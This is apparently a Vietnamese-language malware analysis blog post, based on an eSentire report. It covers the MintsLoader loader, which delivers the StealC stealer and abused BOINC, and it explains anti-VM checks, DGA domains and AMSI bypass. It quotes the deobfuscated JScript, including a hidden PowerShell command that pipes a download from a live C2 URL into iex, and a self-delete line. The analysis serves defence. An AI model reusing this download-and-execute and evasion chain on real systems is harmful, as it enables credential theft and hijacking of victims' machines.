# MintsLoader Phát Tán StealC Malware và BOINC trong Các Cuộc Tấn Công Mạng Có Mục Tiêu

## **Tổng quan**

Trong thời gian gần đây ghi nhận một chiến dịch đang diễn ra, tận dụng một trình tải phần mềm độc hại có tên là MintSloader để phát tán các Payload độc hại như Stealc Information Stealer và Boinc.

Theo như công ty an ninh mạng Esentire cho biết thì chiến dịch lần này chủ yếu nhắm đến các công ty điện, dầu khí và các lĩnh vực dịch vụ pháp lý ở Hoa Kỳ và Châu Âu.

## **Phát hiện chính**

MintsLoader là một **bộ tải phần mềm độc hại (malware loader)**, được sử dụng để phát tán và triển khai các phần mềm độc hại khác trên máy tính của nạn nhân. Theo các báo cáo được ghi nhận thì nó thường được phân phối qua:

* **Trang web giả mạo hoặc phần mềm lậu**
    
* **Email phishing**
    
* **Quảng cáo độc hại (malvertising)**
    

Quá trình lây nhiễm mintsloader bắt đầu khi nạn nhân nhấp vào liên kết trong email spam tải xuống tệp JScript phù hợp với mẫu regex, Fattura \[0-9\] {8} .js.

![Figure 1 – JScript download](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-1-Victim-download.png align="center")

StealC là một loại **malware đánh cắp thông tin (stealer malware)**, chuyên thu thập dữ liệu nhạy cảm từ các thiết bị bị nhiễm. Nó chủ yếu nhắm đến **trình duyệt web** và các ứng dụng phổ biến để đánh cắp:

* **Thông tin đăng nhập** (username, password)
    
* **Cookie trình duyệt** (để duy trì phiên đăng nhập ngay cả khi mật khẩu bị thay đổi)
    
* **Dữ liệu tự động điền (autofill)** như số thẻ tín dụng, địa chỉ
    
* **Ví tiền điện tử** và thông tin tài khoản ngân hàng
    
* **Dữ liệu clipboard** (có thể chứa mật khẩu hoặc mã xác thực)
    

BOINC **không phải là phần mềm độc hại**, nhưng trong một số trường hợp, hacker có thể lạm dụng nền tảng này để khai thác tiền điện tử hoặc thực hiện tính toán trái phép bằng máy tính của người khác.

Nội dung của tệp *JScript* được ghi nhận

![Figure 2 – JScript obfuscated contents](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-2-Fattura-obfuscated.png align="left")

## **Cách kẻ tấn công thực hiện chiến dịch**

1. Ban đầu kẻ tấn công sẽ lừa nạn nhân để có thể tải xuống một tệp bị nhiễm từ một nguồn không rõ ràng, ví dụ như qua email hoặc một trang web lạ. Trong chiến dịch lần này thì tệp `“Fattura[0-9]{8}.js“` đã được tải xuống máy nạn nhân.
    
2. Kẻ tấn công sẽ sử dụng một đoạn mã Powershell độc hại có liên quan tới **Windows Script Host (WSH)**, có thể được sử dụng để tải xuống và thực thi mã độc từ một địa chỉ web, sau đó xóa chính nó khỏi hệ thống của nạn nhân.
    
    ![Figure 3 - Deobfuscated JScript contents](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-3-Deobfuscated-JScript-contents.png align="left")
    
    2.1 `Wscript.Sleep(13000);`:
    
    * Lệnh này làm cho script tạm dừng trong 13 giây. Điều này có thể được sử dụng để trì hoãn thực thi phần còn lại của mã, có thể là để tránh bị phát hiện bởi phần mềm bảo mật hoặc để tạo ra khoảng thời gian cần thiết cho quá trình chuẩn bị trước khi thực thi mã độc.
        
    
    2.2`var shell = WScript.CreateObject ("`[`Wscript.Shell`](http://Wscript.Shell)`");`:
    
    * Đoạn mã này tạo ra một đối tượng [**WScript.Shell**](http://WScript.Shell), cho phép script thực thi các lệnh hệ thống, như chạy các chương trình hoặc thực thi mã.
        
    
    2.3 [`shell.Run`](http://shell.Run)`("powershell -noprofile —executionpolicy bypass -WindowStyle hidden -c \"curl -useb *`[`http://mubuzb3vwv`](http://mubuzb3vwv) `[.]top/1.php?s=nints13' | iex\"");`:
    
    * [`shell.Run`](http://shell.Run)`()`: Lệnh này dùng để chạy một câu lệnh trong môi trường hệ thống. Câu lệnh này yêu cầu PowerShell thực thi một lệnh.
        
    * `powershell -noprofile —executionpolicy bypass`: Đây là cách để chạy PowerShell mà không tải profile người dùng và bỏ qua chính sách thực thi (execution policy) để cho phép chạy mã độc.
        
    * `-WindowStyle hidden`: Thực thi PowerShell trong chế độ ẩn, không hiển thị cửa sổ PowerShell cho người dùng.
        
    * `curl -useb` [`http://mubuzb3vwv.top/1.php?s=nints13`](http://mubuzb3vwv.top/1.php?s=nints13) `| iex`:
        
        * `curl`: Dùng để tải nội dung từ một URL.
            
        * URL [`http://mubuzb3vwv.top/1.php?s=nints13`](http://mubuzb3vwv.top/1.php?s=nints13): Đây là một địa chỉ web mà mã độc sẽ được tải về. Sau khi tải, mã độc được **pipe** (`|`) vào `iex` (alias của `Invoke-Expression` trong PowerShell), khiến mã độc trên website này được thực thi trên hệ thống.
            
    
    2.4 `var filesystemobj = WScript.CreateObject("Scripting.FileSystemobject");`:
    
    * Đoạn mã này tạo ra một đối tượng **FileSystemObject**, cho phép script tương tác với hệ thống tệp (file system), ví dụ như tạo, xóa, sao chép tệp.
        
    
    2.5 `filesystemobj.DeleteFile(WScript.ScriptFullName);`:
    
    * Lệnh này xóa tệp **script** hiện tại (tệp mà mã đang chạy). `WScript.ScriptFullName` trả về đường dẫn đầy đủ của tệp script hiện tại, vì vậy khi thực thi đoạn mã này, script sẽ tự xóa chính nó khỏi hệ thống.
        
3. Bước tiếp theo một đoạn mã Powershell được khởi chạy nhằm mục đích:
    
    * **Tải xuống và thực thi phần mềm độc hại** từ một máy chủ điều khiển (C2 Server).
        
    * **Cài đặt StealC Malware hoặc phần mềm khai thác BOINC** để đánh cắp thông tin hoặc khai thác tài nguyên hệ thống.
        
    * **Mở một backdoor trên máy nạn nhân**, cho phép hacker truy cập vào hệ thống từ xa.
        
    * **Tránh bị phát hiện** bằng cách làm rối lệnh PowerShell để né tránh các phần mềm bảo mật.
        
    
    ![Figure 4 – Obfuscated first stage](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-4-%E2%80%93-Obfuscated-first-stage.png align="center")
    
    ![Figure 5 – Obfuscated next stage](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-5-%E2%80%93-Obfuscated-next-stage.png align="center")
    
4. Kẻ tấn công thực hiện các kiểm tra môi trường máy nạn nhân xem có phải là máy ảo không bằng cách chạy một đoạn mã PowerShell và sử dụng kỹ thuật chống phân tích (Anti-VM Detection)
    
    ![Figure 6 – Check if virtual machine via Get-MpComputerStatus](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-6-%E2%80%93-Check-if-virtual-machine-via-Get-MpComputerStatus.png align="left")
    
    ![Figure 7 – Check if virtual machine via Win32_VideoController object AdapterDACType](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-7-%E2%80%93-Check-if-virtual-machine-via-Win32_VideoController-object-AdapterDACType.png align="left")
    
    ![Figure 8 – Check if virtual machine via Win32_CacheMemory](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-8-%E2%80%93-Check-if-virtual-machine-via-Win32_CacheMemory.png align="left")
    
5. Sau khi đã hoàn tất quá trình kiểm tra trên hệ thống của nạn nhân, kẻ tấn công tiếp tục thực hiện các Powershell để **tạo tên miền C2 (Command & Control)** một cách ngẫu nhiên. Điều này giúp malware liên lạc với máy chủ điều khiển mà không dễ bị phát hiện hoặc chặn bởi các biện pháp an ninh mạng.
    
    ![Figure 11 – Known DGA domains](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-11-%E2%80%93-Known-DGA-domains.png align="center")
    
    ![Figure 10 – Send request to C2 and invoke response](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-10-%E2%80%93-Send-request-to-C2-and-invoke-response.png align="left")
    
    * Ban đầu tạo một `$c2` là một chuỗi rỗng
        
    * Tạo tên miền ngẫu nhiên từ bảng chữ cái
        
    * Ghép thêm `.top` vào để tạo tên miền C2
        
6. Bước tiếp theo trong chiến dịch lần này, những kẻ tấn công sẽ thực hiện chạy một đoạn mã độc nhằm mục đích:
    
    * **Tạm dừng thực thi bằng** `sleep()` để tránh bị phát hiện.
        
    * **Tắt tính năng bảo vệ AMSI của Windows Defender**.
        
    * **Tải xuống tệp thực thi độc hại (**`aa.exe`) từ máy chủ từ xa ([`temp.sh`](http://temp.sh)).
        
    * **Chạy tệp thực thi (**`aa.exe`) để lây nhiễm hệ thống.
        
    
    ![Figure 12 – Final stage, download/execute StealC](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-12-%E2%80%93-Final-stage-downloadexecute-StealC.png align="left")
    
7. Sau khi đã hoàn tất thực thi MintsLoader trên máy nạn nhân, kẻ tấn công tiếp tục thực hiện triển khai StealC Malware. Nó sẽ bắt đầu với một đoạn mã C **để kiểm tra môi trường máy bị nhiễm** trước khi tiếp tục thực thi. Nếu máy tính hoặc người dùng không hợp lệ, chương trình sẽ **tự thoát (**`ExitProcess(0)`) để tránh bị phân tích.
    
    ![Figure 16 – StealC username check for JohnDoe](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-16-Username-check-JohnDoe.png align="center")
    
8. Sau đó StealC Malware tiếp tục kiểm tra để tránh lây nhiễm ở một số quốc gia nhất định: Nga, Ukraine, Belarus, Kazakhstan, Uzbekistan. Khi phát hiện ra máy nạn nhân thuộc các nước trên thì malware sẽ tự động thoát để tránh các rủi ro về mặt pháp lý.
    
    ![Figure 17 – StealC check for banned countries](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-17-Lang-check.png align="center")
    
9. Bên cạnh việc kiểm tra về tên máy, người dùng, quốc gia thì kẻ tấn công tiếp tục thực hiện kiểm tra đến số lượng CPU. Nếu phát hiện máy có **dưới 2 CPU**, malware sẽ **tự thoát (**`ExitProcess(0)`). Thông thường máy ảo sẽ có 1CPU để tiết kiệm tài nguyên. Sau đó một đoạn mã C cũng được thực thi để kiểm tra dung lượng RAM của máy nạn nhân. Nếu máy có **dưới 1111 MB** malware sẽ **tự thoát**
    
    ![Figure 18 – StealC processors check](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-18-Processors-check.png align="center")
    
    ![Figure 19 – StealC memory check](https://esentire-dot-com-assets.s3.amazonaws.com/assetsV3/Blog/Blog-Images/Figure-19-Memory-check.png align="center")
    
10. Sau khi hoàn tất các quá trình kiểm tra thì **StealC bắt đầu có thể đánh cắp**:
    
    * **Tên đăng nhập và mật khẩu** từ trình duyệt
        
    * **Cookie trình duyệt** (có thể dùng để chiếm quyền tài khoản)
        
    * **Dữ liệu tự động điền (autofill)** như thông tin thẻ ngân hàng, địa chỉ
        
    * **Ví tiền điện tử** từ các phần mềm quản lý crypto
        
    * **Dữ liệu clipboard** (có thể chứa mật khẩu hoặc mã xác thực OTP)
        
    
    \=&gt; Sau khi thu thập dữ liệu, StealC gửi tất cả thông tin đến **máy chủ của hacker**.
    
11. Ngay sau đó BOINC (Berkeley Open Infrastructure for Network Computing) sẽ được triển khai. **Hacker lợi dụng BOINC để khai thác tài nguyên máy tính** phục vụ các mục đích như:
    
    * **Khai thác tiền điện tử (crypto mining)** bằng cách sử dụng CPU/GPU của nạn nhân mà họ không biết.
        
    * **Thực hiện tính toán phức tạp** cho các dự án giả mạo để trục lợi.
        

## **IOC**

[iocs/MintsLoader/MintsLoader\_Stealc\_01\_14\_2025.txt at main · eSentire/iocs · GitHub](https://github.com/eSentire/iocs/blob/main/MintsLoader/MintsLoader_Stealc_01_14_2025.txt)

## **Khuyến nghị**

* **Không tải phần mềm từ nguồn không rõ ràng**, đặc biệt là crack/game lậu.
    
* **Không mở email hoặc liên kết đáng ngờ**, ngay cả khi chúng trông giống như từ một tổ chức hợp pháp.
    
* **Cập nhật phần mềm và hệ điều hành thường xuyên** để tránh bị khai thác lỗ hổng bảo mật.
    
* **Kiểm tra tiến trình chạy ngầm trên hệ thống**, nếu thấy BOINC hoặc phần mềm lạ mà bạn không cài đặt, hãy kiểm tra ngay.
    
* **Dùng phần mềm diệt virus mạnh** để phát hiện malware loader như MintsLoader.
    

## **Kết luận**

Chiến dịch MintSloader được ghi nhận có mục tiêu là các tổ chức ở Hoa Kỳ/Châu Âu, chủ yếu được phân phối qua các email spam có chứa liên kết đến tệp JScript hoặc qua clickfix/kongtuke và khi kết hợp với các kẻ đánh cắp thông tin như Stealc, trở thành một mối đe dọa đến tính bảo mật và tính toàn vẹn của dữ liệu nhạy cảm.

**MintsLoader là một công cụ nguy hiểm**, có thể được sử dụng để **triển khai StealC Malware (đánh cắp dữ liệu) và BOINC (khai thác tài nguyên máy tính)** mà không có sự đồng ý của nạn nhân. Nếu nghi ngờ hệ thống bị nhiễm, cần **kiểm tra và loại bỏ ngay lập tức** để tránh hậu quả nghiêm trọng.

## **Tham khảo**

1. [MintsLoader Delivers StealC Malware and BOINC in Targeted Cyber Attacks](https://thehackernews.com/2025/01/mintsloader-delivers-stealc-malware-and.html)
    
2. [eSentire | MintsLoader: StealC and BOINC Delivery](https://www.esentire.com/blog/mintsloader-stealc-and-boinc-delivery)
